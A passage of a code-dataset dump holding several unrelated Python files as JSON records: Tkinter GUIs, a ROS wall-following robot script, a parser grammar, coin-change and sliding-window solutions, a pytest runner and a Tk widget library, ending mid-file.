entry_saturation.place(relwidth=0.15, relheight=relh, relx=0.8, rely=rely, anchor='nw')\n\n rely += devy\n label_rotate = tk.Label(master=frame1, textvariable=tk.StringVar(value=lang[\"Spin FG(rpm):\"]), anchor=\"e\")\n label_rotate.place(relwidth=0.15, relheight=relh, relx=0.3, rely=rely, anchor='nw')\n entry_rotate = ttk.Combobox(master=frame1, textvariable=tk_rotate)\n entry_rotate[\"values\"] = (6.0, 5.0, 4.0, 3.0, 2.0, 1.0, 0.0, - 1.0, -2.0, -3.0, -4.0, -5.0, -6.0)\n entry_rotate.current(6)\n entry_rotate.place(relwidth=0.05, relheight=relh, relx=0.45, rely=rely, anchor='nw')\n\n check_use_glow = tk.Checkbutton(master=frame1, text=lang[\"Glow Effect (SLOW)\"],\n variable=tk_use_glow, onvalue=True, offvalue=False, anchor=\"e\")\n check_use_glow.place(relwidth=0.15, relheight=relh, relx=0.55, rely=rely, anchor='nw')\n\n label_bright = tk.Label(master=frame1, textvariable=tk.StringVar(value=lang[\"Spec. Brt.:\"]), anchor=\"e\")\n label_bright.place(relwidth=0.1, relheight=relh, relx=0.7, rely=rely, anchor='nw')\n entry_bright = ttk.Combobox(master=frame1, textvariable=tk_bright)\n entry_bright[\"values\"] = (1.0, 0.9, 0.8, 0.7, 0.6, 0.5, 0.4, 0.3, 0.2, 0.1, 0.0)\n entry_bright.current(4)\n entry_bright.place(relwidth=0.15, relheight=relh, relx=0.8, rely=rely, anchor='nw')\n\n rely += devy\n scr = scrolledtext.ScrolledText(master=frame1, width=20, height=10)\n scr.place(relwidth=0.9, relheight=relh * 6.5, relx=0.05, rely=rely, anchor='nw')\n\n rely += relh * 6.8\n\n entry_output = tk.Entry(master=frame1, textvariable=tk_output_path)\n entry_output.place(relwidth=0.44, relheight=relh, relx=0.05, rely=rely, anchor='nw')\n entry_fname = tk.Entry(master=frame1, textvariable=tk_filename)\n entry_fname.place(relwidth=0.25, relheight=relh, relx=0.5, rely=rely, anchor='nw')\n label_mp4 = tk.Label(master=frame1, text=\".mp4\", anchor=\"w\")\n label_mp4.place(relwidth=0.05, relheight=relh, relx=0.75, rely=rely, anchor='nw')\n btn_output = tk.Button(master=frame1, text=lang[\"Output (REQUIRED)\"], command=selectOutput)\n btn_output.place(relwidth=0.15, relheight=relh, relx=0.8, rely=rely, anchor='nw')\n rely += devy\n\n progress = ttk.Progressbar(master=frame1, orient=tk.HORIZONTAL, mode='determinate', value=0)\n progress.place(relwidth=0.7, relheight=relh, relx=0.05, rely=rely, anchor='nw')\n\n btn_blend = tk.Button(master=frame1, text=lang[\"Blend & Export\"], command=startBlending)\n btn_blend.place(relwidth=0.15, relheight=relh, relx=0.8, rely=rely, anchor='nw')\n\n loadConfig()\n clearLog()\n\n try:\n ctypes.windll.shcore.SetProcessDpiAwareness(1)\n ScaleFactor = ctypes.windll.shcore.GetScaleFactorForDevice(0)\n root.tk.call('tk', 'scaling', ScaleFactor / 75) # DPI settings\n root_view.tk.call('tk', 'scaling', ScaleFactor / 75)\n root_view.iconphoto(False, tk.PhotoImage(file='./Source/icon-small.png'))\n root.iconphoto(False, tk.PhotoImage(file='./Source/icon-small.png'))\n except:\n pass\n\n\n def disable_event():\n if fb.isRunning:\n tkinter.messagebox.showinfo(lang[\"Notice\"], lang[\"Please stop blending before quit!\"])\n else:\n root.destroy()\n\n\n def close_view():\n root_view.withdraw()\n\n\n root.protocol(\"WM_DELETE_WINDOW\", disable_event)\n root_view.protocol(\"WM_DELETE_WINDOW\", close_view)\n frame1.tkraise()\n showPreview()\n root.mainloop()\n","sub_path":"SourceCode/FanBlender_GUI.py","file_name":"FanBlender_GUI.py","file_ext":"py","file_size_in_byte":42455,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"106017447","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\nAuthor : Ntwali Bashige\nCopyright : Copyright 2019 - Ntwali Bashige\nLicense : MIT\nVersion : 0.0.1\nMaintainer : Ntwali Bashige\nEmail : ntwali.bashige@gmail.com\n\"\"\"\n\nfrom asm.parsing.parselets.expressions import LiteralParselet, AssignmentParselet, StaticExpressionParselet, DynamicExpressionParselet\nfrom asm.parsing.parselets.declarations import CircuitDeclarationParselet\nfrom common.token_type import TokenType\n\n\nclass Grammar(object):\n \"\"\"\n\n \"\"\"\n parselets = {\n TokenType.CIRCUIT : CircuitDeclarationParselet(),\n TokenType.IDENTIFIER : StaticExpressionParselet(),\n TokenType.PERCENT : DynamicExpressionParselet(),\n TokenType.EQUAL : AssignmentParselet(),\n TokenType.CBINARY : LiteralParselet(),\n }\n","sub_path":"as/src/asm/parsing/grammar.py","file_name":"grammar.py","file_ext":"py","file_size_in_byte":852,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"218442667","text":"#!/usr/bin/env python\nimport math\nimport rospy\nfrom geometry_msgs.msg import Twist\nfrom sensor_msgs.msg import LaserScan\n\n\n# Check if there seems to be an object in front of the robot, on the data from the left value to the right value, if any of them are less than minRange then return's false\ndef freeFront(data, left, right, minRange):\n for i in range(left, right):\n ranger = data[i]\n if ranger < minRange:\n return False\n\n return True\n\n\n# Returns true if the robot can move forward the specified distance\n# (Takes into account width of robot)\ndef canMoveForward(data, distance):\n robotWidth = 1.5\n # How many reading it will check (distributed evenly across 180 degrees)\n values = range(1, 30)\n for i in values:\n maxReading = abs((robotWidth/2)/math.cos(math.radians((180/values[-1])*i)))\n if maxReading > distance:\n maxReading = distance\n reading = data[(len(data) / values[-1]) * i]\n #rospy.loginfo(\"Reading \"+str(maxReading) + \" ~ index \"+str((len(data) / values[-1]) * i))\n if reading < maxReading:\n return reading\n return -1\n\n\ndef findAverage(data, low, high):\n temp = 0;\n count = 0;\n for i in range(low, high):\n if (data[i] != float('NaN') and data[i] != float('Inf')):\n temp = temp + data[i]\n count = count + 1\n if count == 0:\n return 20\n else:\n return temp / count\n\n\ndef findGreater(data, fLow, fHigh, sLow, sHigh):\n firstAverage = findAverage(data, fLow, fHigh)\n secondAverage = findAverage(data, sLow, sHigh)\n\n rospy.loginfo(\n \"Front \" + str(firstAverage) + \"; Back \" + str(secondAverage) + \" = \" + str(firstAverage - secondAverage))\n\n return firstAverage - secondAverage\n\n\ndef laser_callback(laser_data):\n global detectedWall\n\n new_speed = Twist()\n\n maxSpeed = 0.3# 0.25\n maxRotateSpeed = 0.3# 0.3 # negative value = rotate right\n divider = 1\n\n # Values of laser indicators that indicate front\n frontLeft = 200\n frontRight = 300\n minRange = 0.75\n\n # Detected first wall\n maxRangeLeft = 1.5\n desRangeLeftMin = 0.75\n desRangeLeftMax = 0.76\n\n # Range to indicate back right\n firstLower = 0\n firstHigher = 64\n # Range to indicate front right\n secondLower = 64\n secondHigher = 128\n\n rospy.loginfo(\"STUFF \" + str(detectedWall))\n\n collision = canMoveForward(laser_data.ranges, minRange)\n\n if collision != -1:\n # find new wall by rotating\n if collision < 0.4:\n new_speed.linear.x = 0.0\n else:\n new_speed.linear.x = maxSpeed * 0.5\n new_speed.angular.z = maxRotateSpeed * 2\n rospy.loginfo(\"Rotating for collision \")\n else:\n new_speed.linear.x = maxSpeed\n averageLeft = findAverage(laser_data.ranges, firstLower, secondHigher)\n # if have a wall to our right\n if averageLeft < maxRangeLeft:\n if detectedWall < 100:\n detectedWall += 5\n if desRangeLeftMin <= averageLeft <= desRangeLeftMax:\n # wall is nicely away from us\n rospy.loginfo(\"Wall is nicely away from us\")\n new_speed.linear.x = maxSpeed\n new_speed.angular.z = 0.0\n if averageLeft < desRangeLeftMin:\n # wall is too close: rotate away from wall\n rospy.loginfo(\"Wall is too close\")\n new_speed.linear.x = maxSpeed\n new_speed.angular.z = maxRotateSpeed\n if averageLeft > desRangeLeftMax:\n # wall is too far: rotate towards wall\n rospy.loginfo(\"Wall is too far\")\n new_speed.linear.x = maxSpeed\n new_speed.angular.z = -(maxRotateSpeed)\n\n if findGreater(laser_data.ranges, firstLower, firstHigher, secondLower, secondHigher) < -1:\n rospy.loginfo(\"Detected convex wall\")\n new_speed.linear.x = maxSpeed\n new_speed.angular.z = -(maxRotateSpeed)\n else:\n # No wall to our left\n new_speed.linear.x = maxSpeed\n if detectedWall > 0:\n detectedWall -= 1\n if detectedWall > 25:\n new_speed.angular.z = -maxRotateSpeed * 1.5\n\n pub.publish(new_speed)\n\n\nif __name__ == '__main__':\n detectedWall = 0\n rospy.init_node('obstacle_stopper')\n\n raw_input('turn on motors and press enter to start')\n\n rospy.Subscriber('base_scan', LaserScan, laser_callback)\n pub = rospy.Publisher('cmd_vel', Twist, queue_size=100)\n rospy.spin()\n","sub_path":"exercise2/src/wall_hugger.py","file_name":"wall_hugger.py","file_ext":"py","file_size_in_byte":4592,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"643487731","text":"#!/usr/bin/python\n\nimport sys\n\n\ndef making_change(amount, denominations):\n # Initialize cache\n cache = [0] * (amount + 1)\n cache[0] = 1\n\n # For each possible coin, starting with the smallest\n for coin in denominations:\n # For every amount between that coin value and the total amount\n for amount2 in range(coin, amount + 1):\n # Add the number of solutions found if we took out that coin\n cache[amount2] += cache[amount2 - coin]\n\n return cache[amount]\n\nif __name__ == \"__main__\":\n # Test our your implementation from the command line\n # with `python making_change.py [amount]` with different amounts\n if len(sys.argv) > 1:\n denominations = [1, 5, 10, 25, 50]\n amount = int(sys.argv[1])\n else:\n print(\"Usage: making_change.py [amount]\")\n","sub_path":"making_change/making_change.py","file_name":"making_change.py","file_ext":"py","file_size_in_byte":822,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"365445636","text":"#coding:utf-8\nimport os\nimport pytest\nimport argparse\nfrom config import BaseConfig\nfrom common.tools import get_case_dir,send_dingding\nfrom common.utils import dingTalk\n\n\ndef get_parser():\n parser = argparse.ArgumentParser(description=\"argparse\")\n parser.add_argument('--product', type=str, default=BaseConfig.current_name)\n return parser\n\n\nif __name__ == \"__main__\":\n parser = get_parser()\n args = parser.parse_args()\n BaseConfig.current_name = args.product\n # 获取要执行的产品的用例目录\n test_case_dir = get_case_dir(args.product)\n print(\"********此次执行的产品测试用例是:%s********\"%test_case_dir)\n\n #删除之前报告\n os.system('rm ./report/tmp/*.json')\n # 生成报告数据\n pytest.main(['-v', '-s', test_case_dir, '--alluredir', './report/tmp'])\n # 打开报告\n os.system('allure serve ./report/tmp')\n\n # 发送钉钉\n send_dingding(args.product)\n\n\n\n","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":939,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"500280972","text":"#!/usr/bin/env python3\n\nfrom tkinter import *\nfrom tkinter import ttk\nfrom tkinter import filedialog\n\nfrom machine import Machine\nfrom gui_mem_inspect import MemInspect\n\nclass Gui(Tk):\n def __init__(self, machine):\n super().__init__()\n self.machine = machine\n self.title(\"Windlass\")\n self.columnconfigure(0, weight=1)\n self.rowconfigure(0, weight=1)\n\n # Create mainframe inside of root window. Seems redundant, but\n # ttk widgets can be themed, while regular tkninter widgets can't.\n mainframe = ttk.Frame(self, padding=\"3 3 3 3\", relief=\"flat\")\n mainframe.grid(column=0, row=0, sticky=(N, S, E, W))\n mainframe.columnconfigure(0, weight=1)\n mainframe.rowconfigure(0, weight=1)\n\n # Create topframe that will hold the buttons & registers.\n topframe = ttk.Frame(mainframe, relief=\"flat\")\n topframe.grid(column=0, row=0, sticky=(N, S, E, W))\n topframe.columnconfigure(0, weight=1)\n topframe.rowconfigure(0, weight=1)\n \n\n # --------------------------------------------------------------------\n # BUTTONS\n # --------------------------------------------------------------------\n button_frame = ttk.Frame(topframe, relief=\"sunken\")\n button_frame.grid(column=0, row=0)\n buttons = [ ttk.Button(button_frame, text=\"Load\", command=self._load)\n , ttk.Button(button_frame, text=\"Step\", command=self._step)\n , ttk.Button(button_frame, text=\"Run\", command=self._run)\n , ttk.Button(button_frame, text=\"Stop\", command=self._stop)\n ]\n for button in buttons:\n button.pack(side=LEFT)\n\n # --------------------------------------------------------------------\n # REGISTERS & IO\n # --------------------------------------------------------------------\n # StringVars for register Entry widgets.\n self.PC = StringVar()\n self.IR = StringVar()\n self.OR = StringVar()\n self.ACC = StringVar()\n self.input = StringVar()\n self.output = StringVar()\n \n self._copy_registers()\n \n register_frame = ttk.Frame(topframe)\n register_frame.grid(column=0, row=1, pady=3, sticky=(N, S, E, W))\n \n PC_label = ttk.Label(register_frame, text=\"PC\")\\\n .grid(row=0, column=0, sticky=W)\n PC_entry = Entry(register_frame)\n PC_entry.config(width=7, textvariable=self.PC, relief=\"flat\")\n PC_entry.grid(row=0, column=1, sticky=E)\n \n IR_label = ttk.Label(register_frame, text=\"IR\")\\\n .grid(row=1, column=0, sticky=W)\n IR_entry = Entry(register_frame)\n IR_entry.config(width=7, textvariable=self.IR, relief=\"flat\")\n IR_entry.grid(row=1, column=1, sticky=E)\n \n OR_label = ttk.Label(register_frame, text=\"OR\")\\\n .grid(row=2, column=0, sticky=W)\n OR_entry = Entry(register_frame)\n OR_entry.config(width=7, textvariable=self.OR, relief=\"flat\")\n OR_entry.grid(row=2, column=1, sticky=E)\n \n ACC_label = ttk.Label(register_frame, text=\"ACC\")\\\n .grid(row=3, column=0, sticky=W)\n ACC_entry = Entry(register_frame)\n ACC_entry.config(width=7, textvariable=self.ACC, relief=\"flat\")\n ACC_entry.grid(row=3, column=1, sticky=E)\n\n # --------------------------------------------------------------------\n # STATUS\n # --------------------------------------------------------------------\n # status_frame = ttk.Frame(mainframe)\n # status_frame.grid(column=1, row=2, sticky=(S, E, W))\n\n # self.status = StringVar()\n # self.status.set('HALTed')\n # status = Label(status_frame, textvariable=self.status)\n # status.pack(fill=BOTH)\n \n # --------------------------------------------------------------------\n # I/O\n # --------------------------------------------------------------------\n bottomframe = ttk.Frame(mainframe)\n bottomframe.grid(row=1, column=0, sticky=(N, S, E, W))\n\n self.console = Text(bottomframe)\n self.console.config(width=80, height=12)\n self.console.grid(row=0, column=0, sticky=(N, S, E, W))\n self.console.config(state=DISABLED)\n # TODO: Disable scrolling w/ mousewheel.\n # TODO: Lock view to bottom of buffer ('autoscroll')\n\n self.input = Entry(bottomframe)\n self.input.config(width=80)\n self.input.grid(row=1, column=0, sticky=(E, W))\n self.input.config(state=DISABLED)\n\n self._print(\"Machine ready.\")\n\n\n # --------------------------------------------------------------------\n # BUTTON COMMANDS\n # --------------------------------------------------------------------\n \n def _load(self):\n self.machine.load_text(filedialog.askopenfilename())\n\n #self.status.set(\"Program loaded. Click step to step through\")\n\n def _step(self):\n self.machine.step()\n self._copy_registers()\n #if self.machine.needs_input:\n # self.status.set(\"Machine needs input.\\n\"\n # \"Enter value in input field and press enter.\")\n \n def _run(self):\n self.machine.run()\n self._copy_registers()\n #if self.machine.needs_input:\n # self.status.set(\"Machine needs input.\\n\"\n # \"Enter value in input field and press enter.\")\n\n def _stop(self):\n self.machine.running = False # TODO: Reduce coupling\n\n # --------------------------------------------------------------------\n # PRIVATE HELEPERS\n # --------------------------------------------------------------------\n\n def _copy_registers(self):\n # TODO: Reduce coupling\n self.PC.set(self.machine.PC)\n self.OR.set(self.machine.OR)\n self.IR.set(str(self.machine.IR))\n self.ACC.set(self.machine.ACC)\n\n def _give_input(self, *args):\n self.machine.take_input(self.input.get())\n self._copy_registers()\n #self.status.set(\"Input accepted, HALT'd.\")\n\n def _print(self, s):\n self.console.config(state=NORMAL)\n self.console.insert(END, s + \"\\n\")\n self.console.config(state=DISABLED)\n\nif __name__ == \"__main__\":\n m = Machine()\n g = Gui(m)\n mi = MemInspect(g)\n g.mainloop()\n","sub_path":"gui_main.py","file_name":"gui_main.py","file_ext":"py","file_size_in_byte":6443,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"570807433","text":"class Solution:\n def maxSlidingWindow0(self, nums, k: int):\n '''\n 给定一个数组 nums,有一个大小为 k 的滑动窗口从数组的最左侧移动到数组的最右侧。\n 你只可以看到在滑动窗口 k 内的数字。滑动窗口每次只向右移动一位。\n 返回滑动窗口最大值。\n 输入: nums = [1,3,-1,-3,5,3,6,7], 和 k = 3\n 输出: [3,3,5,5,6,7]\n '''\n if len(nums) <= 0:\n return []\n\n maxAry = [None] * (len(nums) - k + 1)\n\n for i in range(len(maxAry)):\n maxAry[i] = max(nums[i:i + k])\n\n return maxAry\n\n def maxSlidingWindow(self, nums, k: int):\n '''\n 给定一个数组 nums,有一个大小为 k 的滑动窗口从数组的最左侧移动到数组的最右侧。\n 你只可以看到在滑动窗口 k 内的数字。滑动窗口每次只向右移动一位。\n 返回滑动窗口最大值。\n 输入: nums = [1,3,-1,-3,5,3,6,7], 和 k = 3\n 输出: [3,3,5,5,6,7]\n '''\n if len(nums) <= 0:\n return nums\n max_ary = [max(nums[:k])]\n max_val = max_ary[0]\n for i in range(k, len(nums)):\n if nums[i] > max_val:\n max_val = nums[i]\n # 最大值滑出窗口\n elif nums[i - k] == max_val:\n max_val = max(nums[i - k + 1:i + 1])\n max_ary.append(max_val)\n return max_ary\n\n\ns = Solution()\nprint(s.maxSlidingWindow([1, 3, -1, -3, 5, 3, 6, 7], 3))\nprint(s.maxSlidingWindow([1, -1], 1))\nprint(s.maxSlidingWindow([7, 2, 4], 2))\n","sub_path":"Leetcode/239.maxSlidingWindow.py","file_name":"239.maxSlidingWindow.py","file_ext":"py","file_size_in_byte":1613,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"504138515","text":"from __future__ import annotations\n\nimport collections.abc\nimport contextlib\nimport re\nfrom functools import partial, partialmethod\nfrom typing import Any, Callable, Iterator, Literal\n\nfrom ._constants import _BINDING_ALIASES, _KEYSYMS, _VALID_STATES\nfrom ._event import Event\nfrom ._layouts import LayoutManager\nfrom ._misc import ScreenDistance, TukaanError\nfrom ._utils import (\n _callbacks,\n _widgets,\n create_command,\n from_tcl,\n get_tcl_interp,\n py_to_tcl_arguments,\n reversed_dict,\n update_before,\n)\n\n\nclass ChildStatistics:\n def __init__(self, widget) -> None:\n self._widget = widget\n\n def number_of_type(self, type) -> int:\n try:\n return self._widget._child_type_count[type]\n except KeyError:\n return 0\n\n @property\n def children(self) -> list[BaseWidget]:\n return list(self._widget._children.values())\n\n @property\n def grid_managed_children(self) -> tuple:\n return tuple(\n self._widget.from_tcl(elem)\n for elem in self._widget._tcl_call((str,), \"grid\", \"slaves\", self._widget)\n )\n\n @property\n def position_managed_children(self) -> tuple:\n return tuple(\n self._widget.from_tcl(elem)\n for elem in self._widget._tcl_call((str,), \"place\", \"slaves\", self._widget)\n )\n\n\nclass MethodAndPropMixin:\n _tcl_call: Callable\n _keys: dict[str, Any]\n layout: LayoutManager\n tcl_path: str\n wm_path: str\n parent: TkWidget\n child_stats: ChildStatistics\n\n def __repr__(self) -> str:\n return (\n f\"\"\n )\n\n __str__ = __repr__\n\n def _repr_details(self) -> str:\n # overridden in subclasses\n return \"\"\n\n @property\n def is_busy(self) -> bool:\n return self._tcl_call(bool, \"tk\", \"busy\", \"status\", self)\n\n @is_busy.setter\n def is_busy(self, is_busy) -> None:\n if is_busy:\n self._tcl_call(None, \"tk\", \"busy\", \"hold\", self)\n else:\n self._tcl_call(None, \"tk\", \"busy\", \"forget\", self)\n\n @contextlib.contextmanager\n def busy(self):\n self.is_busy = True\n try:\n yield\n finally:\n self.is_busy = False\n\n @property\n def id(self) -> int:\n return self._tcl_call(int, \"winfo\", \"id\", self.tcl_path)\n\n def _cget(self, key: str) -> Any:\n if isinstance(self._keys[key], tuple):\n type_spec, key = self._keys[key]\n else:\n type_spec = self._keys[key]\n\n if type_spec == \"func\":\n # return a callable func, not tcl name\n result = self._tcl_call(str, self, \"cget\", f\"-{key}\")\n return _callbacks[result]\n\n if isinstance(type_spec, dict):\n result = self._tcl_call(str, self, \"cget\", f\"-{key}\")\n return reversed_dict(type_spec)[result]\n\n return self._tcl_call(type_spec, self, \"cget\", f\"-{key}\")\n\n def config(self, **kwargs) -> None:\n for key in tuple(kwargs.keys()):\n if isinstance(self._keys[key], tuple):\n # if key has a tukaan alias, use the tuple's 2-nd item as the tcl key\n kwargs[self._keys[key][1]] = kwargs.pop(key)\n\n get_tcl_interp()._tcl_call(\n None, self, \"configure\", *py_to_tcl_arguments(**kwargs)\n )\n\n @classmethod\n def from_tcl(cls, tcl_value: str) -> TkWidget:\n # unlike in teek, this method won't raise a TypeError,\n # if the return widget, and the class you call it on isn't the same\n # this could be annoying, but very useful if you don't know\n # what kind of widget it is and just want to get it\n\n # teek.Button.from_tcl(teek.Label().to_tcl())\n # >>> TypeError: blablabla\n\n # tukaan.Button.from_tcl(teek.tukaan().to_tcl())\n # >>> '.app.label_1'\n\n if tcl_value == \".\":\n return get_tcl_interp()\n\n return _widgets[tcl_value]\n\n def to_tcl(self) -> str:\n return self.tcl_path\n\n @property\n def _class(self):\n return self._tcl_call(str, \"winfo\", \"class\", self)\n\n @property\n def keys(self) -> list:\n return sorted(self._keys.keys())\n\n @property\n def bbox(self) -> tuple:\n return (self.x, self.y, self.x + self.width, self.y + self.height)\n\n @property # type: ignore\n @update_before\n def x(self) -> int:\n return self._tcl_call(int, \"winfo\", \"rootx\", self)\n\n @property # type: ignore\n @update_before\n def y(self) -> int:\n return self._tcl_call(int, \"winfo\", \"rooty\", self)\n\n @property # type: ignore\n @update_before\n def width(self) -> int:\n return self._tcl_call(int, \"winfo\", \"width\", self)\n\n @property # type: ignore\n @update_before\n def height(self) -> int:\n return self._tcl_call(int, \"winfo\", \"height\", self)\n\n def focus(self):\n self._tcl_call(None, \"focus\", self)\n\n def hide(self):\n if self.tcl_path == \".app\" or self._class == \"Toplevel\":\n self._tcl_call(None, \"wm\", \"withdraw\", self.wm_path)\n elif self.layout._real_manager == \"grid\":\n self._tcl_call(None, \"grid\", \"remove\", self.tcl_path)\n elif self.layout._real_manager == \"place\":\n self._temp_position_info = self._tcl_call(\n {\"-x\": int, \"-y\": int, \"-anchor\": str, \"-width\": int, \"-height\": int},\n \"place\",\n \"info\",\n self.tcl_path,\n )\n self._tcl_call(None, \"place\", \"forget\", self.tcl_path)\n\n def unhide(self):\n if self.tcl_path == \".app\" or self._class == \"Toplevel\":\n self._tcl_call(None, \"wm\", \"deiconify\", self.wm_path)\n elif self.layout._real_manager == \"grid\":\n self._tcl_call(None, \"grid\", \"configure\", self.tcl_path)\n elif self.layout._real_manager == \"place\":\n self._tcl_call(\n None,\n (\n \"place\",\n \"configure\",\n self.tcl_path,\n *(\n elem\n for key, value in self._temp_position_info.items()\n for elem in (key, value)\n if value is not None\n ),\n ),\n )\n\n def __parse_sequence(self, sequence: str) -> str:\n tcl_sequence = sequence\n regex_str = r\"\"\n\n if sequence in _BINDING_ALIASES:\n tcl_sequence = _BINDING_ALIASES[sequence]\n elif re.match(regex_str, sequence):\n search = re.search(regex_str, sequence)\n up_or_down = {\"Down\": \"Press\", \"Up\": \"Release\"}\n thing = search.group(2) # type: ignore\n tcl_sequence = f\"\" # type: ignore\n\n return tcl_sequence\n\n def _call_bind(\n self,\n widget_or_all: MethodAndPropMixin | Literal[\"all\"],\n sequence_s: tuple[str, ...] | str,\n func: Callable | Literal[\"\"],\n overwrite: bool,\n sendevent: bool,\n data: Any,\n ) -> None:\n def _real_func(func: Callable, data: Any, sequence: str, *args):\n event = Event(sequence, func, data)\n\n for (_, type_, attr), string_value in zip(_BINDING_SUBSTS, args):\n try:\n value = from_tcl(type_, string_value)\n if attr == \"keysymbol\":\n if value == \"??\":\n value = None\n elif value in _KEYSYMS.values():\n value = reversed_dict(_KEYSYMS)[string_value]\n except (ValueError, TukaanError):\n # ValueError when trying to int(\"??\")\n value = None\n\n setattr(event, attr, value)\n\n return func() if not sendevent else func(event)\n\n subst_str = \" \".join(subs for subs, *_ in _BINDING_SUBSTS)\n\n if isinstance(sequence_s, str):\n sequence_s = (sequence_s,)\n for sequence in sequence_s:\n self._tcl_call(\n None,\n \"bind\",\n widget_or_all,\n self.__parse_sequence(sequence),\n f\"{'' if overwrite else '+'} if\"\n + f\" {{[{create_command(partial(_real_func, func, data, sequence))}\"\n + f\" {subst_str}] eq {{break}} }} {{ break }}\"\n if callable(func)\n else \"\", # FIXME: this is disgustingly unreadable\n )\n\n def _bind(\n self,\n what,\n sequence: tuple[str, ...] | str,\n func: Callable,\n overwrite: bool = False,\n sendevent: bool = False,\n data=None,\n ) -> None:\n self._call_bind(\n what if what == \"all\" else self, sequence, func, overwrite, sendevent, data\n )\n\n def _unbind(self, what, sequence: str):\n self._call_bind(\n what if what == \"all\" else self, sequence, \"\", True, False, None\n )\n\n def generate_event(self, sequence: str):\n self._tcl_call(None, \"event\", \"generate\", self, self.__parse_sequence(sequence))\n\n bind = partialmethod(_bind, \"self\")\n unbind = partialmethod(_unbind, \"self\")\n bind_global = partialmethod(_bind, \"all\")\n unbind_global = partialmethod(_unbind, \"all\")\n\n\nclass TukaanWidget:\n \"\"\"Base class for every Tukaan widget\"\"\"\n\n ...\n\n\nclass TkWidget(MethodAndPropMixin):\n \"\"\"Base class for every Tk-based widget\"\"\"\n\n layout: LayoutManager\n\n def __init__(self):\n self._children: dict[str, BaseWidget] = {}\n self._child_type_count: dict[type, int] = {}\n _widgets[self.tcl_path] = self\n self.child_stats = ChildStatistics(self)\n\n\n_BINDING_SUBSTS = (\n (\"%D\", float, \"delta\"),\n (\"%K\", str, \"keysymbol\"),\n (\"%k\", str, \"keycode\"),\n (r\"%W\", TkWidget, \"widget\"),\n (r\"%X\", ScreenDistance, \"rel_x\"),\n (r\"%Y\", ScreenDistance, \"rel_y\"),\n (r\"%height\", ScreenDistance, \"height\"),\n (r\"%width\", ScreenDistance, \"width\"),\n (r\"%x\", ScreenDistance, \"x\"),\n (r\"%y\", ScreenDistance, \"y\"),\n)\n\n\nclass StateSet(collections.abc.MutableSet):\n \"\"\"\n Object that contains the state of the widget,\n though it inherits from MutableSet, it behaves like a list\n \"\"\"\n\n def __init__(self, widget: TkWidget) -> None:\n self._widget = widget\n\n def __repr__(self) -> str:\n return f\"\"\n\n def __iter__(self) -> Iterator[str]:\n return iter(self._widget._tcl_call([str], self._widget, \"state\"))\n\n def __len__(self) -> int:\n return len(self._widget._tcl_call([str], self._widget, \"state\"))\n\n def __contains__(self, state: object) -> bool:\n return self._widget._tcl_call(bool, self._widget, \"instate\", state)\n\n def add_or_discard(self, action: Literal[\"add\", \"discard\"], state: str) -> None:\n if state not in _VALID_STATES:\n raise RuntimeError\n if action == \"discard\":\n state = f\"!{state}\"\n\n self._widget._tcl_call(None, self._widget, \"state\", state)\n\n add: Callable[[str], None] = partialmethod(add_or_discard, \"add\")\n discard: Callable[[str], None] = partialmethod(add_or_discard, \"discard\")\n\n\nclass BaseWidget(TkWidget):\n _keys: dict[str, Any | tuple[Any, str]]\n\n def __init__(self, parent: TkWidget | None, **kwargs) -> None:\n self.parent = parent or get_tcl_interp()\n self.tcl_path = self._give_me_a_name()\n self._tcl_call: Callable = get_tcl_interp()._tcl_call\n\n TkWidget.__init__(self)\n\n self.parent._children[self.tcl_path] = self\n\n self._tcl_call(\n None, self._tcl_class, self.tcl_path, *py_to_tcl_arguments(**kwargs)\n )\n\n self.layout = LayoutManager(self)\n self._temp_manager = None\n\n if self._tcl_class.startswith(\"ttk::\"):\n self.state = StateSet(self)\n # else:\n # need to define separately for non-ttk widgets\n\n def __setattr__(self, key: str, value: Any) -> None:\n if key in self._keys.keys():\n self.config(**{key: value})\n else:\n super().__setattr__(key, value)\n\n def __getattr__(self, key: str) -> Any:\n if key in self._keys.keys():\n return self._cget(key)\n else:\n return super().__getattribute__(key)\n\n def _give_me_a_name(self) -> str:\n klass = type(self)\n\n # FIXME: more elegant way to count child types\n # itertools.count isn't good, because we need plain ints\n\n count = self.parent._child_type_count.get(klass, 0) + 1\n self.parent._child_type_count[klass] = count\n\n return f\"{self.parent.tcl_path}.{klass.__name__.lower()}_{count}\"\n\n def destroy(self):\n for child in self.child_stats.children:\n child.destroy()\n\n self._tcl_call(None, \"destroy\", self.tcl_path)\n del self.parent._children[self.tcl_path]\n del _widgets[self.tcl_path]\n","sub_path":"tukaan/_base.py","file_name":"_base.py","file_ext":"py","file_size_in_byte":13192,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"313507126","text":"import numpy as np\nimport os.path\nfrom argparse import ArgumentParser\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.ensemble import AdaBoostClassifier, RandomForestClassifier\nfrom sklearn.cluster import KMeans\nfrom typing import List, Optional, Tuple\n\nfrom dataset.dataset import Dataset, DataSeries\nfrom models.adaptive_model import AdaptiveModel\nfrom threshold_optimization.optimize_thresholds import get_serialized_info\nfrom utils.rnn_utils import get_logits_name, get_states_name, AdaptiveModelType, get_input_name\nfrom utils.np_utils import index_of, round_to_precision\nfrom utils.constants import OUTPUT, BIG_NUMBER, SMALL_NUMBER, INPUTS, SEQ_LENGTH, DROPOUT_KEEP_RATE\nfrom utils.file_utils import save_pickle_gz, read_pickle_gz, extract_model_name\nfrom controllers.distribution_prior import DistributionPrior\n\n\nPOWER = np.array([24.085, 32.776, 37.897, 43.952, 48.833, 50.489, 54.710, 57.692, 59.212, 59.251])\nVIOLATION_FACTOR = 0.01\nUNDERSHOOT_FACTOR = 0.01\nCONTROLLER_PATH = 'model-logistic-controller-{0}.pkl.gz'\nMARGIN = 1000\nMIN_INIT = 0.8\nMAX_INIT = 1.0\nC = 0.01\nNOISE = 0.01\n\n\ndef 